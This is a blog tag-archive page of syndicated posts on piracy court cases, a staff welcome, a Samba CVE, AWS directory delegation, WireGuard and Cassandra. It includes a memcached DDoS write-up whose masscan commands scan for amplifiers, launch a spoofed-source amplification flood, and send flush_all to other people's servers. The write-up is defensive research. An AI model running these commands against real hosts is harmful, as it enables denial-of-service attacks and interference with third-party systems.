Tag Archives: nist

Founder of Fan-Made Subtitle Site Lose Copyright Infringement Appeal

Post Syndicated from Andy original https://torrentfreak.com/founder-of-fan-made-subtitle-site-lose-copyright-infringement-appeal-180318/

For millions of people around the world, subtitles are the only way to enjoy media in languages other than that in the original production. For the deaf and hard of hearing, they are absolutely essential.

Movie and TV show companies tend to be quiet good at providing subtitles eventually but in line with other restrictive practices associated with their industry, it can often mean a long wait for the consumer, particularly in overseas territories.

For this reason, fan-made subtitles have become somewhat of a cottage industry in recent years. Where companies fail to provide subtitles quickly enough, fans step in and create them by hand. This has led to the rise of a number of subtitling platforms, including the now widely recognized Undertexter.se in Sweden.

The platform had its roots back in 2003 but first hit the headlines in 2013 when Swedish police caused an uproar by raiding the site and seizing its servers.

“The people who work on the site don’t consider their own interpretation of dialog to be something illegal, especially when we’re handing out these interpretations for free,” site founder Eugen Archy said at the time.

Vowing to never give up in the face of pressure from the authorities, anti-piracy outfit Rättighetsalliansen (Rights Alliance), and companies including Nordisk Film, Paramount, Universal, Sony and Warner, Archy said that the battle over what began as a high school project would continue.

“No Hollywood, you played the wrong card here. We will never give up, we live in a free country and Swedish people have every right to publish their own interpretations of a movie or TV show,” he said.

It took four more years but in 2017 the Undertexter founder was prosecuted for distributing copyright-infringing subtitles while facing a potential prison sentence.

Things didn’t go well and last September the Attunda District Court found him guilty and sentenced the then 32-year-old operator to probation. In addition, he was told to pay 217,000 Swedish krona ($26,400) to be taken from advertising and donation revenues collected through the site.

Eugen Archy took the case to appeal, arguing that the Svea Hovrätt (Svea Court of Appeal) should acquit him of all the charges and dismiss or at least reduce the amount he was ordered to pay by the lower court. Needless to say, this was challenged by the prosecution.

On appeal, Archy agreed that he was the person behind Undertexter but disputed that the subtitle files uploaded to his site infringed on the plaintiffs’ copyrights, arguing they were creative works in their own right.

While to an extent that may have been the case, the Court found that the translations themselves depended on the rights connected to the original work, which were entirely held by the relevant copyright holders. While paraphrasing and parody might be allowed, pure translations are completely covered by the rights in the original and cannot be seen as new and independent works, the Court found.

The Svea Hovrätt also found that Archy acted intentionally, noting that in addition to administering the site and doing some translating work himself, it was “inconceivable” that he did not know that the subtitles made available related to copyrighted dialog found in movies.

In conclusion, the Court of Appeal upheld Archy’s copyright infringement conviction (pdf, Swedish) and sentenced him to probation, as previously determined by the Attunda District Court.

Last year, the legal status of user-created subtitles was also tested in the Netherlands. In response to local anti-piracy outfit BREIN forcing several subtitling groups into retreat, a group of fansubbers decided to fight back.

After raising their own funds, in 2016 the “Free Subtitles Foundation” (Stichting Laat Ondertitels Vrij – SLOV) took the decision to sue BREIN with the hope of obtaining a favorable legal ruling.

In 2017 it all fell apart when the Amsterdam District Court handed down its decision and sided with BREIN on each count.

The Court found that subtitles can only be created and distributed after permission has been obtained from copyright holders. Doing so outside these parameters amounts to copyright infringement.

Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN reviews, discounts, offers and coupons.

Welcome Michele – Our HR Coordinator

Post Syndicated from Yev original https://www.backblaze.com/blog/welcome-michele-our-hr-coordinator/

Backblaze is growing rapidly and as we have more and more job listings coming online and more employees to corral, we needed another member on our Human Resources team! Enter Michele, who is joining the HR folks to help recruit, onboard, and expand our HR organization. Lets learn a bit more about Michele shall we?

What is your Backblaze Title?
HR Coordinator.

Where are you originally from?
I was born and raised in the East Bay.

What attracted you to Backblaze?
The opportunity to learn new skills, as most of my experience is in office administration… I’m excited to jump into the HR world!

What do you expect to learn while being at Backblaze?
So much! All of the ins and outs of HR, the hiring and onboarding processes, and everything in between…so excited!

Where else have you worked?
I’ve previously worked at Clars Auction Gallery where I was Consignor Relations for 6 years, and most recently at Stellar Academy for Dyslexics where I was the Office Administrator/Bookkeeper.

Where did you go to school?
San Francisco Institute of Esthetics and Cosmetology.

What’s your dream job?
Pastry Chef!

Favorite place you’ve traveled?
Maui. I could lay on the beach and bob in the water all day, every day! But also, Disney World…who doesn’t love a good Disney vacation?

Favorite hobby?
Baking, traveling, reading, exploring new restaurants, SF Giants games

Star Trek or Star Wars?
Star Wars.

Coke or Pepsi?
Black iced tea?

Favorite food?
Pretty much everything…street tacos, ramen, sushi, Thai, pho.

Why do you like certain things?
Because why not?

Anything else you’d like you’d like to tell us?
I love Disney!

Another person who loves Disney! Welcome to the team Michele, we’ll have lots of tea ready for you!

The post Welcome Michele – Our HR Coordinator appeared first on Backblaze Blog | Cloud Storage & Cloud Backup.

Tamilrockers Arrests: Police Parade Alleged Movie Pirates on TV

Post Syndicated from Andy original https://torrentfreak.com/tamilrockers-arrests-police-parade-alleged-movie-pirates-on-tv-180315/

Just two years ago around 277 million people used the Internet in India. Today there are estimates as high as 355 million and with a population of more than 1.3 billion, India has plenty of growth yet to come.

Also evident is that in addition to a thirst for hard work, many Internet-enabled Indians have developed a taste for Internet piracy. While the US and Europe were the most likely bases for pirate site operators between 2000 and 2015, India now appears in a growing number of cases, from torrent and streaming platforms to movie release groups.

One site that is clearly Indian-focused is the ever-popular Tamilrockers. The movie has laughed in the face of the authorities for a number of years, skipping from domain to domain as efforts to block the site descend into a chaotic game of whack-a-mole. Like The Pirate Bay, Tamilrockers has burned through plenty of domains including tamilrockers.in, tamilrockers.ac, tamilrockers.me, tamilrockers.co, tamilrockers.is, tamilrockers.us and tamilrockers.ro.

Now, however, the authorities are claiming a significant victory against the so-far elusive operators of the site. The anti-piracy cell of the Kerala police announced last evening that they’ve arrested five men said to be behind both Tamilrockers and alleged sister site, DVDRockers.

They’re named as alleged Tamilrockers owner ‘Prabhu’, plus ‘Karthi’ and ‘Suresh’ (all aged 24), plus alleged DVD Rockers owner ‘Johnson’ and ‘Jagan’ (elsewhere reported as ‘Maria John’). The men were said to be generating between US$1,500 and US$3,000 each per month. The average salary in India is around $600 per annum.

While details of how the suspects were caught tend to come later in US and European cases, the Indian authorities are more forthright. According to Anti-Piracy Cell Superintendent B.K. Prasanthan, who headed the team that apprehended the men, it was a trail of advertising revenue crumbs that led them to the suspects.

Prasanthan revealed that it was an email, sent by a Haryana-based ad company to an individual who was arrested in 2016 in a similar case, that helped in tracking the members of Tamilrockers.

“This ad company had sent a mail to [the individual], offering to publish ads on the website he was running. In that email, the company happened to mention that they have ties with Tamilrockers. We got the information about Tamilrockers through this ad company,” Prasanthan said.

That information included the bank account details of the suspects.

Given the technical nature of the sites, it’s perhaps no surprise that the suspects are qualified in the IT field. Prasanthan revealed that all had done well.

“All the gang members were technically qualified. It even included MSc and BSc holders in computer science. They used to record movies in pieces from various parts of the world and join [them together]. We are trying to trace more members of the gang including Karthi’s brothers,” Prasanathan said.

All five men were remanded in custody but not before they were paraded in front of the media, footage which later appeared on TV.

Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN reviews, discounts, offers and coupons.

An important Samba 4 security release

Post Syndicated from corbet original https://lwn.net/Articles/749192/rss

Anybody running Samba 4 servers probably wants to take a look at this
and upgrade their systems. “CVE-2018-1057:
On a Samba 4 AD DC the LDAP server in all versions of Samba from
4.0.0 onwards incorrectly validates permissions to modify passwords
over LDAP allowing authenticated users to change any other users’
passwords, including administrative users.

Pirate Site Admins Receive Suspended Sentences, Still Face €60m Damages Claim

Post Syndicated from Andy original https://torrentfreak.com/pirate-site-admins-receive-suspended-sentences-still-face-e60m-damages-claim-180313/

After being founded in 2009, French site Liberty Land (LL) made its home in Canada. At the time listed among France’s top 200 sites, Liberty Land carried an estimated 30,000 links to a broad range of unlicensed content.

Like many other indexes of its type, LL carried no content itself but hosted links to content hosted elsewhere, on sites like Megaupload and Rapidshare, for example. This didn’t save the operation from an investigation carried out by rightsholder groups SACEM and ALPA, which filed a complaint against Liberty Land with the French authorities in 2010.

Liberty Land

In May 2011 and alongside complaints from police that the people behind Liberty Land had taken extreme measures to hide themselves away, authorities arrested several men linked to the site in Marseille, near Le Havre, and in the Paris suburb of Montreuil.

Despite the men facing a possible five years in jail and fines of up to $700,000, the inquiry dragged on for nearly seven years. The trial of its alleged operators, now aged between 29 and 36-years-old, finally went ahead January 30 in Rennes.

The men faced charges that they unlawfully helped to distribute movies, TV series, games, software, music albums and e-books without permission from rightsholders. In court, one defended the site as being just like Google.

“For me, we had the same role as Google,” he said. “We were an SEO site. There is a difference between what we were doing and the distribution of pirated copies on the street.”

According to the prosecution, the site made considerable revenues from advertising, estimated at more than 300,000 euros between January 2009 and May 2011. The site’s two main administrators reportedly established an offshore company in the British Virgin Islands and a bank account in Latvia where they deposited between 100,000 and 150,000 euros each.

The prosecutor demanded fines for the former site admins and sentences of between six and 12 months in prison. Last week the Rennes Criminal Court rendered its decision, sentencing the four men to suspended sentences of between two and three months. More than 176,000 euros generated by the site was also confiscated by the Court.

While the men will no doubt be relieved that this extremely long case has reached a conclusion of sorts, it’s not over yet. 20minutes reports that the claims for damages filed by copyright groups including SACEM won’t be decided until September and they are significant, totaling 60 million euros.

Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN discounts, offers and coupons

U.S. Navy Under Fire in Mass Software Piracy Lawsuit

Post Syndicated from Ernesto original https://torrentfreak.com/u-s-navy-under-fire-in-mass-software-piracy-lawsuit-180312/

In 2011 and 2012, the US Navy began using BS Contact Geo, a 3D virtual reality application developed by German company Bitmanagement.

The Navy reportedly agreed to purchase licenses for use on 38 computers, but things began to escalate.

While Bitmanagement was hopeful that it could sell additional licenses to the Navy, the software vendor soon discovered the US Government had already installed it on 100,000 computers without extra compensation.

In a Federal Claims Court complaint filed by Bitmanagement two years ago, that figure later increased to hundreds of thousands of computers. Because of the alleged infringement, Bitmanagement demanded damages totaling hundreds of millions of dollars.

In the months that followed both parties conducted discovery and a few days ago the software company filed a motion for partial summary judgment, asking the court to rule that the US Government is liable for copyright infringement.

According to the software company, it’s clear that the US Government crossed a line.

“The Navy admits that it began installing the software onto hundreds of thousands of machines in the summer of 2013, and that it ultimately installed the software onto at least 429,604 computers. When it learned of this mass installation, Bitmanagement was surprised, but confident that it would be compensated for the numerous copies the Government had made,” the motion reads.

“Over time, however, it became clear that the Navy had no intention to pay Bitmanagement for the software it had copied without authorization, as it declined to execute any license on a scale commensurate with what it took,” Bitmanagement adds.

In its defense, the US Government had argued that it bought concurrent-use licenses, which permitted the software to be installed across the Navy network. However, Bitmanagement argues that it is impossible as the reseller that sold the software was only authorized to sell PC licenses.

In addition, the software company points out that the word “concurrent” doesn’t appear in the contracts, nor was there any mention of mass installations.

The Government also argued that Bitmanagement impliedly authorized it to install the software on hundreds of thousands of computers. This defense also makes little sense, the software company counters.

The Navy licensed an earlier version of the software for $30,000, which could be used on 100 computers, so it would seem odd that it could use the later version on hundreds of thousands of computers for only $5,490, the company argues.

“To establish that it had an implied license, the Government must show that Bitmanagement — despite having licensed a less advanced copy of its software to the Government in 2008 on a PC basis that allowed for installation on a total of 100 computers in exchange for $30,000 — later authorized the Government to make an unlimited number of installations of its advanced software product for $5,490.”

The full motion brings up a wide range of other arguments as well which, according to Bitmanagement, make it clear that the US Government is liable for copyright infringement. It, therefore, asks the court for a partial summary judgment.

“Bitmanagement respectfully requests that this Court grant summary judgment as to the Government’s liability for copyright infringement and hold that the Government copied BS Contact Geo beyond the limits of its license, on a scale equal to the hundreds of thousands of unauthorized copies of BS Contact Geo that the Government either installed or made available for installation,” the company concludes.

If the Government is indeed liable the scale of the damages will be decided at a later stage. The software company previously noted that this could be as high as $600 million.

This is not the first time that the U.S. military has been ‘caught’ pirating software. A few years ago it was accused of operating unlicensed logistics software, a case the Obama administration eventually settled for $50 million.

A copy of the motion for partial summary judgment is available here (pdf).

Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN discounts, offers and coupons

ISP Wants EU Court Ruling on Identifying ‘Pirating’ Subscribers

Post Syndicated from Ernesto original https://torrentfreak.com/isp-wants-eu-court-ruling-on-identifying-pirating-subscribers-180308/

In recent years Internet provider Bahnhof has fought hard to protect the privacy of its subscribers.

The company has been a major opponent of extensive data retention requirements, has launched a free VPN to its users, and vowed to protect subscribers from a looming copyright troll invasion.

The privacy-oriented ISP is doing everything in its power to prevent its Swedish customers from being exposed. It has even refused to hand over customer details in piracy cases when these requests are made by the police.

This stance resulted in a lawsuit in which Bahnhof argued that piracy isn’t a serious enough offense to warrant invading the privacy of its customers. The ISP said that this is in line with European privacy regulations.

Last month, the Administrative Court in Stockholm disagreed with this argument, ordering the ISP to hand over the requested information.

The Court ruled that disclosure of subscriber data to law enforcement agencies does not contravene EU law. It, therefore, ordered the ISP to comply, as the Swedish Post and Telecom Authority (PTS) had previously recommended.

While the order is a serious setback for Bahnhof, the ISP isn’t letting the case go just yet. It has filed an appeal where it maintains that disclosing details of alleged pirates goes against EU regulations.

Bahnhof says NO

To settle the matter once and for all, Bahnhof has asked the Swedish Appeals Court to refer the case to the EU Court of Justice, to have an EU ruling on the data disclosure issue.

“Bahnhof, therefore, requires the Court of Appeal to obtain a preliminary ruling from EU law so that the European Court of Justice itself can rule on the matter before the Court of First Instance reaches a final position,” Bahnhof writes.

Law enforcement requests for piracy-related data are quite common in Sweden. Bahnhof previously showed that more than a quarter of all police request for subscriber data were for cases related to online file-sharing, trumping crimes such as grooming minors, forgery and fraud.

The ISP is vowing to fight this case to the bitter end. While it has no problem with law enforcement efforts in general, the company doesn’t want to hand over customer data without proper judicial review of a suspected crime.

“This legal process has already been going on for two years and Bahnhof is ready to continue for as long as necessary to achieve justice. Bahnhof will never agree to hand over delicate sensitive customer data without judicial review,” the company concludes.

Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN discounts, offers and coupons

How to Delegate Administration of Your AWS Managed Microsoft AD Directory to Your On-Premises Active Directory Users

Post Syndicated from Vijay Sharma original https://aws.amazon.com/blogs/security/how-to-delegate-administration-of-your-aws-managed-microsoft-ad-directory-to-your-on-premises-active-directory-users/

You can now enable your on-premises users administer your AWS Directory Service for Microsoft Active Directory, also known as AWS Managed Microsoft AD. Using an Active Directory (AD) trust and the new AWS delegated AD security groups, you can grant administrative permissions to your on-premises users by managing group membership in your on-premises AD directory. This simplifies how you manage who can perform administration. It also makes it easier for your administrators because they can sign in to their existing workstation with their on-premises AD credential to administer your AWS Managed Microsoft AD.

AWS created new domain local AD security groups (AWS delegated groups) in your AWS Managed Microsoft AD directory. Each AWS delegated group has unique AD administrative permissions. Users that are members in the new AWS delegated groups get permissions to perform administrative tasks, such as add users, configure fine-grained password policies and enable Microsoft enterprise Certificate Authority. Because the AWS delegated groups are domain local in scope, you can use them through an AD Trust to your on-premises AD. This eliminates the requirement to create and use separate identities to administer your AWS Managed Microsoft AD. Instead, by adding selected on-premises users to desired AWS delegated groups, you can grant your administrators some or all of the permissions. You can simplify this even further by adding on-premises AD security groups to the AWS delegated groups. This enables you to add and remove users from your on-premises AD security group so that they can manage administrative permissions in your AWS Managed Microsoft AD.

In this blog post, I will show you how to delegate permissions to your on-premises users to perform an administrative task–configuring fine-grained password policies–in your AWS Managed Microsoft AD directory. You can follow the steps in this post to delegate other administrative permissions, such as configuring group Managed Service Accounts and Kerberos constrained delegation, to your on-premises users.


Until now, AWS Managed Microsoft AD delegated administrative permissions for your directory by creating AD security groups in your Organization Unit (OU) and authorizing these AWS delegated groups for common administrative activities. The admin user in your directory created user accounts within your OU, and granted these users permissions to administer your directory by adding them to one or more of these AWS delegated groups.

However, if you used your AWS Managed Microsoft AD with a trust to an on-premises AD forest, you couldn’t add users from your on-premises directory to these AWS delegated groups. This is because AWS created the AWS delegated groups with global scope, which restricts adding users from another forest. This necessitated that you create different user accounts in AWS Managed Microsoft AD for the purpose of administration. As a result, AD administrators typically had to remember additional credentials for AWS Managed Microsoft AD.

To address this, AWS created new AWS delegated groups with domain local scope in a separate OU called AWS Delegated Groups. These new AWS delegated groups with domain local scope are more flexible and permit adding users and groups from other domains and forests. This allows your admin user to delegate your on-premises users and groups administrative permissions to your AWS Managed Microsoft AD directory.

Note: If you already have an existing AWS Managed Microsoft AD directory containing the original AWS delegated groups with global scope, AWS preserved the original AWS delegated groups in the event you are currently using them with identities in AWS Managed Microsoft AD. AWS recommends that you transition to use the new AWS delegated groups with domain local scope. All newly created AWS Managed Microsoft AD directories have the new AWS delegated groups with domain local scope only.

Now, I will show you the steps to delegate administrative permissions to your on-premises users and groups to configure fine-grained password policies in your AWS Managed Microsoft AD directory.


For this post, I assume you are familiar with AD security groups and how security group scope rules work. I also assume you are familiar with AD trusts.

The instructions in this blog post require you to have the following components running:

Solution overview

I will now show you how to manage which on-premises users have delegated permissions to administer your directory by efficiently using on-premises AD security groups to manage these permissions. I will do this by:

  1. Adding on-premises groups to an AWS delegated group. In this step, you sign in to management instance connected to AWS Managed Microsoft AD directory as admin user and add on-premises groups to AWS delegated groups.
  2. Administer your AWS Managed Microsoft AD directory as on-premises user. In this step, you sign in to a workstation connected to your on-premises AD using your on-premises credentials and administer your AWS Managed Microsoft AD directory.

For the purpose of this blog, I already have an on-premises AD directory (in this case, on-premises.com). I also created an AWS Managed Microsoft AD directory (in this case, corp.example.com) that I use with Amazon RDS for SQL Server. To enable Integrated Windows Authentication to my on-premises.com domain, I established a one-way outgoing trust from my AWS Managed Microsoft AD directory to my on-premises AD directory. To administer my AWS Managed Microsoft AD, I created an Amazon EC2 for Windows Server instance (in this case, Cloud Management). I also have an on-premises workstation (in this case, On-premises Management), that is connected to my on-premises AD directory.

The following diagram represents the relationships between the on-premises AD and the AWS Managed Microsoft AD directory.

The left side represents the AWS Cloud containing AWS Managed Microsoft AD directory. I connected the directory to the on-premises AD directory via a 1-way forest trust relationship. When AWS created my AWS Managed Microsoft AD directory, AWS created a group called AWS Delegated Fine Grained Password Policy Administrators that has permissions to configure fine-grained password policies in AWS Managed Microsoft AD.

The right side of the diagram represents the on-premises AD directory. I created a global AD security group called On-premises fine grained password policy admins and I configured it so all members can manage fine grained password policies in my on-premises AD. I have two administrators in my company, John and Richard, who I added as members of On-premises fine grained password policy admins. I want to enable John and Richard to also manage fine grained password policies in my AWS Managed Microsoft AD.

While I could add John and Richard to the AWS Delegated Fine Grained Password Policy Administrators individually, I want a more efficient way to delegate and remove permissions for on-premises users to manage fine grained password policies in my AWS Managed Microsoft AD. In fact, I want to assign permissions to the same people that manage password policies in my on-premises directory.

Diagram showing delegation of administrative permissions to on-premises users

To do this, I will:

  1. As admin user, add the On-premises fine grained password policy admins as member of the AWS Delegated Fine Grained Password Policy Administrators security group from my Cloud Management machine.
  2. Manage who can administer password policies in my AWS Managed Microsoft AD directory by adding and removing users as members of the On-premises fine grained password policy admins. Doing so enables me to perform all my delegation work in my on-premises directory without the need to use a remote desktop protocol (RDP) session to my Cloud Management instance. In this case, Richard, who is a member of On-premises fine grained password policy admins group can now administer AWS Managed Microsoft AD directory from On-premises Management workstation.

Although I’m showing a specific case using fine grained password policy delegation, you can do this with any of the new AWS delegated groups and your on-premises groups and users.

Let’s get started.

Step 1 – Add on-premises groups to AWS delegated groups

In this step, open an RDP session to the Cloud Management instance and sign in as the admin user in your AWS Managed Microsoft AD directory. Then, add your users and groups from your on-premises AD to AWS delegated groups in AWS Managed Microsoft AD directory. In this example, I do the following:

  1. Sign in to the Cloud Management instance with the user name admin and the password that you set for the admin user when you created your directory.
  2. Open the Microsoft Windows Server Manager and navigate to Tools > Active Directory Users and Computers.
  3. Switch to the tree view and navigate to corp.example.com > AWS Delegated Groups. Right-click AWS Delegated Fine Grained Password Policy Administrators and select Properties.
  4. In the AWS Delegated Fine Grained Password Policy window, switch to Members tab and choose Add.
  5. In the Select Users, Contacts, Computers, Service Accounts, or Groups window, choose Locations.
  6. In the Locations window, select on-premises.com domain and choose OK.
  7. In the Enter the object names to select box, enter on-premises fine grained password policy admins and choose Check Names.
  8. Because I have a 1-way trust from AWS Managed Microsoft AD to my on-premises AD, Windows prompts me to enter credentials for an on-premises user account that has permissions to complete the search. If I had a 2-way trust and the admin account in my AWS Managed Microsoft AD has permissions to read my on-premises directory, Windows will not prompt me.In the Windows Security window, enter the credentials for an account with permissions for on-premises.com and choose OK.
  9. Click OK to add On-premises fine grained password policy admins group as a member of the AWS Delegated Fine Grained Password Policy Administrators group in your AWS Managed Microsoft AD directory.

At this point, any user that is a member of On-premises fine grained password policy admins group has permissions to manage password policies in your AWS Managed Microsoft AD directory.

Step 2 – Administer your AWS Managed Microsoft AD as on-premises user

Any member of the on-premises group(s) that you added to an AWS delegated group inherited the permissions of the AWS delegated group.

In this example, Richard signs in to the On-premises Management instance. Because Richard inherited permissions from Delegated Fine Grained Password Policy Administrators, he can now administer fine grained password policies in the AWS Managed Microsoft AD directory using on-premises credentials.

  1. Sign in to the On-premises Management instance as Richard.
  2. Open the Microsoft Windows Server Manager and navigate to Tools > Active Directory Users and Computers.
  3. Switch to the tree view, right-click Active Directory Users and Computers, and then select Change Domain.
  4. In the Change Domain window, enter corp.example.com, and then choose OK.
  5. You’ll be connected to your AWS Managed Microsoft AD domain:

Richard can now administer the password policies. Because John is also a member of the AWS delegated group, John can also perform password policy administration the same way.

In future, if Richard moves to another division within the company and you hire Judy as a replacement for Richard, you can simply remove Richard from On-premises fine grained password policy admins group and add Judy to this group. Richard will no longer have administrative permissions, while Judy can now administer password policies for your AWS Managed Microsoft AD directory.


We’ve tried to make it easier for you to administer your AWS Managed Microsoft AD directory by creating AWS delegated groups with domain local scope. You can add your on-premises AD groups to the AWS delegated groups. You can then control who can administer your directory by managing group membership in your on-premises AD directory. Your administrators can sign in to their existing on-premises workstations using their on-premises credentials and administer your AWS Managed Microsoft AD directory. I encourage you to explore the new AWS delegated security groups by using Active Directory Users and Computers from the management instance for your AWS Managed Microsoft AD. To learn more about AWS Directory Service, see the AWS Directory Service home page. If you have questions, please post them on the Directory Service forum. If you have comments about this post, submit them in the “Comments” section below.


Some notes on memcached DDoS

Post Syndicated from Robert Graham original http://blog.erratasec.com/2018/03/some-notes-on-memcached-ddos.html

I thought I’d write up some notes on the memcached DDoS. Specifically, I describe how many I found scanning the Internet with masscan, and how to use masscan as a killswitch to neuter the worst of the attacks.

Test your servers

I added code to my port scanner for this, then scanned the Internet:
masscan -pU:11211 –banners | grep memcached
This example scans the entire Internet (/0). Replaced with your address range (or ranges).
This produces output that looks like this:
Banner on port 11211/udp on [memcached] uptime=230130 time=1520485357 version=1.4.13
Banner on port 11211/udp on [memcached] uptime=3935192 time=1520485363 version=1.4.17
Banner on port 11211/udp on [memcached] uptime=230130 time=1520485357 version=1.4.13
Banner on port 11211/udp on [memcached] uptime=399858 time=1520485362 version=1.4.20
Banner on port 11211/udp on [memcached] uptime=29429482 time=1520485363 version=1.4.20
Banner on port 11211/udp on [memcached] uptime=2879363 time=1520485366 version=1.2.6
Banner on port 11211/udp on [memcached] uptime=42083736 time=1520485365 version=1.4.13
The “banners” check filters out those with valid memcached responses, so you don’t get other stuff that isn’t memcached. To filter this output further, use  the ‘cut’ to grab just column 6:
… | cut -d ‘ ‘ -f 6 | cut -d: -f1
You often get multiple responses to just one query, so you’ll want to sort/uniq the list:
… | sort | uniq

My results from an Internet wide scan

I got 15181 results (or roughly 15,000).
People are using Shodan to find a list of memcached servers. They might be getting a lot results back that response to TCP instead of UDP. Only UDP can be used for the attack.

Other researchers scanned the Internet a few days ago and found ~31k. I don’t know if this means people have been removing these from the Internet.

Masscan as exploit script

BTW, you can not only use masscan to find amplifiers, you can also use it to carry out the DDoS. Simply import the list of amplifier IP addresses, then spoof the source address as that of the target. All the responses will go back to the source address.
masscan -iL amplifiers.txt -pU:11211 –spoof-ip –rate 100000
I point this out to show how there’s no magic in exploiting this. Numerous exploit scripts have been released, because it’s so easy.

Why memcached servers are vulnerable

Like many servers, memcached listens to local IP address for local administration. By listening only on the local IP address, remote people cannot talk to the server.
However, this process is often buggy, and you end up listening on either (all interfaces) or on one of the external interfaces. There’s a common Linux network stack issue where this keeps happening, like trying to get VMs connected to the network. I forget the exact details, but the point is that lots of servers that intend to listen only on end up listening on external interfaces instead. It’s not a good security barrier.
Thus, there are lots of memcached servers listening on their control port (11211) on external interfaces.

How the protocol works

The protocol is documented here. It’s pretty straightforward.
The easiest amplification attacks is to send the “stats” command. This is 15 byte UDP packet that causes the server to send back either a large response full of useful statistics about the server.  You often see around 10 kilobytes of response across several packets.
A harder, but more effect attack uses a two step process. You first use the “add” or “set” commands to put chunks of data into the server, then send a “get” command to retrieve it. You can easily put 100-megabytes of data into the server this way, and causes a retrieval with a single “get” command.
That’s why this has been the largest amplification ever, because a single 100-byte packet can in theory cause a 100-megabytes response.
Doing the math, the 1.3 terabit/second DDoS divided across the 15,000 servers I found vulnerable on the Internet leads to an average of 100-megabits/second per server. This is fairly minor, and is indeed something even small servers (like Raspberry Pis) can generate.

Neutering the attack (“kill switch”)

If they are using the more powerful attack against you, you can neuter it: you can send a “flush_all” command back at the servers who are flooding you, causing them to drop all those large chunks of data from the cache.
I’m going to describe how I would do this.
First, get a list of attackers, meaning, the amplifiers that are flooding you. The way to do this is grab a packet sniffer and capture all packets with a source port of 11211. Here is an example using tcpdump.
tcpdump -i -w attackers.pcap src port 11221
Let that run for a while, then hit [ctrl-c] to stop, then extract the list of IP addresses in the capture file. The way I do this is with tshark (comes with Wireshark):
tshark -r attackers.pcap -Tfields -eip.src | sort | uniq > amplifiers.txt
Now, craft a flush_all payload. There are many ways of doing this. For example, if you are using nmap or masscan, you can add the bytes to the nmap-payloads.txt file. Also, masscan can read this directly from a packet capture file. To do this, first craft a packet, such as with the following command line foo:
echo -en “\x00\x00\x00\x00\x00\x01\x00\x00flush_all\r\n” | nc -q1 -u 11211
Capture this packet using tcpdump or something, and save into a file “flush_all.pcap”. If you want to skip this step, I’ve already done this for you, go grab the file from GitHub:
Now that we have our list of attackers (amplifiers.txt) and a payload to blast at them (flush_all.pcap), use masscan to send it:
masscan -iL amplifiers.txt -pU:112211 –pcap-payload flush_all.pcap

Reportedly, “shutdown” may also work to completely shutdown the amplifiers. I’ll leave that as an exercise for the reader, since of course you’ll be adversely affecting the servers.

Some notes

Here are some good reading on this attack:

[$] Virtual private networks with WireGuard

Post Syndicated from corbet original https://lwn.net/Articles/748582/rss

Virtual private networks (VPNs) offer a lot in the way of increased
security and privacy. They have also tended to offer less desirable
features like administrative complexity and reduced performance, though; as
a result, many potential VPN users decide not to bother. A relatively new
project called WireGuard hopes to
address both of those problems with an in-kernel solution that is both
simple and fast.

Best Practices for Running Apache Cassandra on Amazon EC2

Post Syndicated from Prasad Alle original https://aws.amazon.com/blogs/big-data/best-practices-for-running-apache-cassandra-on-amazon-ec2/

Apache Cassandra is a commonly used, high performance NoSQL database. AWS customers that currently maintain Cassandra on-premises may want to take advantage of the scalability, reliability, security, and economic benefits of running Cassandra on Amazon EC2.

Amazon EC2 and Amazon Elastic Block Store (Amazon EBS) provide secure, resizable compute capacity and storage in the AWS Cloud. When combined, you can deploy Cassandra, allowing you to scale capacity according to your requirements. Given the number of possible deployment topologies, it’s not always trivial to select the most appropriate strategy suitable for your use case.

In this post, we outline three Cassandra deployment options, as well as provide guidance about determining the best practices for your use case in the following areas:

  • Cassandra resource overview
  • Deployment considerations
  • Storage options
  • Networking
  • High availability and resiliency
  • Maintenance
  • Security

Before we jump into best practices for running Cassandra on AWS, we should mention that we have many customers who decided to use DynamoDB instead of managing their own Cassandra cluster. DynamoDB is fully managed, serverless, and provides multi-master cross-region replication, encryption at rest, and managed backup and restore. Integration with AWS Identity and Access Management (IAM) enables DynamoDB customers to implement fine-grained access control for their data security needs.

Several customers who have been using large Cassandra clusters for many years have moved to DynamoDB to eliminate the complications of administering Cassandra clusters and maintaining high availability and durability themselves. Gumgum.com is one customer who migrated to DynamoDB and observed significant savings. For more information, see Moving to Amazon DynamoDB from Hosted Cassandra: A Leap Towards 60% Cost Saving per Year.

AWS provides options, so you’re covered whether you want to run your own NoSQL Cassandra database, or move to a fully managed, serverless DynamoDB database.

Cassandra resource overview

Here’s a short introduction to standard Cassandra resources and how they are implemented with AWS infrastructure. If you’re already familiar with Cassandra or AWS deployments, this can serve as a refresher.

Resource Cassandra AWS

A single Cassandra deployment.


This typically consists of multiple physical locations, keyspaces, and physical servers.

A logical deployment construct in AWS that maps to an AWS CloudFormation StackSet, which consists of one or many CloudFormation stacks to deploy Cassandra.
Datacenter A group of nodes configured as a single replication group.

A logical deployment construct in AWS.


A datacenter is deployed with a single CloudFormation stack consisting of Amazon EC2 instances, networking, storage, and security resources.


A collection of servers.


A datacenter consists of at least one rack. Cassandra tries to place the replicas on different racks.

A single Availability Zone.
Server/node A physical virtual machine running Cassandra software. An EC2 instance.
Token Conceptually, the data managed by a cluster is represented as a ring. The ring is then divided into ranges equal to the number of nodes. Each node being responsible for one or more ranges of the data. Each node gets assigned with a token, which is essentially a random number from the range. The token value determines the node’s position in the ring and its range of data. Managed within Cassandra.
Virtual node (vnode) Responsible for storing a range of data. Each vnode receives one token in the ring. A cluster (by default) consists of 256 tokens, which are uniformly distributed across all servers in the Cassandra datacenter. Managed within Cassandra.
Replication factor The total number of replicas across the cluster. Managed within Cassandra.

Deployment considerations

One of the many benefits of deploying Cassandra on Amazon EC2 is that you can automate many deployment tasks. In addition, AWS includes services, such as CloudFormation, that allow you to describe and provision all your infrastructure resources in your cloud environment.

We recommend orchestrating each Cassandra ring with one CloudFormation template. If you are deploying in multiple AWS Regions, you can use a CloudFormation StackSet to manage those stacks. All the maintenance actions (scaling, upgrading, and backing up) should be scripted with an AWS SDK. These may live as standalone AWS Lambda functions that can be invoked on demand during maintenance.

You can get started by following the Cassandra Quick Start deployment guide. Keep in mind that this guide does not address the requirements to operate a production deployment and should be used only for learning more about Cassandra.

Deployment patterns

In this section, we discuss various deployment options available for Cassandra in Amazon EC2. A successful deployment starts with thoughtful consideration of these options. Consider the amount of data, network environment, throughput, and availability.

